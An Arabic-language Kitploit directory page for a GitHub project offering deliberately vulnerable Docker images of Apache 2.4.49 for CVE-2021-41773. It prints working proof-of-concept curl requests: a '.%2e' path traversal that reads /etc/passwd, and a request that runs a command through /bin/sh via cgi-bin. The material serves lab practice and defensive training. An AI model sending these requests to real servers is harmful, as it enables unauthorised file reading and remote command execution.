Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-41773 — صور Docker معرضة للثغرات لـ CVE-2021-41773 | Kitploit
أدوات/GitHubGitHub/blueteamsteve/cve-2021-41773
أمن الحاوياتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

صور Docker معرضة للثغرات لـ CVE-2021-41773

عرض المستودع
2382منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

صور Docker القابلة للاستغلال لثغرة CVE-2021-41773 اجتياز المسار في Apache

تنطبق هذه الثغرة فقط على الإصدار 2.4.49 مع إعدادات محددة غير افتراضية. في حالات معينة، يمكن أن تؤدي إلى قراءة ملفات أو تنفيذ أوامر.

تغريدة https://twitter.com/ptswarm/status/1445376079548624899

الإعداد القابل للاستغلال لقراءة الملفات

يمكن سحب الحاويات مباشرة من Docker Hub باستخدام

docker pull blueteamsteve/cve-2021-41773:no-cgid

وتشغيلها باستخدام

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو ببساطة استبعاد -dit من أمر التشغيل أعلاه لتدفق stdio docker logs <container-id>

إثبات المفهوم لقراءة الملفات

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

الإعداد القابل للاستغلال لتنفيذ الأوامر عن بعد (RCE)

يمكن سحب الحاويات مباشرة من Docker Hub باستخدام

docker pull blueteamsteve/cve-2021-41773:with-cgid

وتشغيلها باستخدام

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

يمكن عرض سجلات Apache باستخدام الأمر أدناه، أو ببساطة استبعاد -dit من أمر التشغيل أعلاه لتدفق stdio docker logs <container-id>

إثبات المفهوم لتنفيذ الأوامر

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

بناء حاويات Docker مخصصة

قم بتعديل وبناء نسخك الخاصة باستخدام ملف dockerfile وملفات httpd.conf القالب في المجلدات الفرعية

  • استخدم ./no-cgi للإعداد القابل للاستغلال لقراءة الملفات
  • استخدم ./with-cgi للإعداد القابل للاستغلال لتنفيذ الأوامر
تنزيل الأداة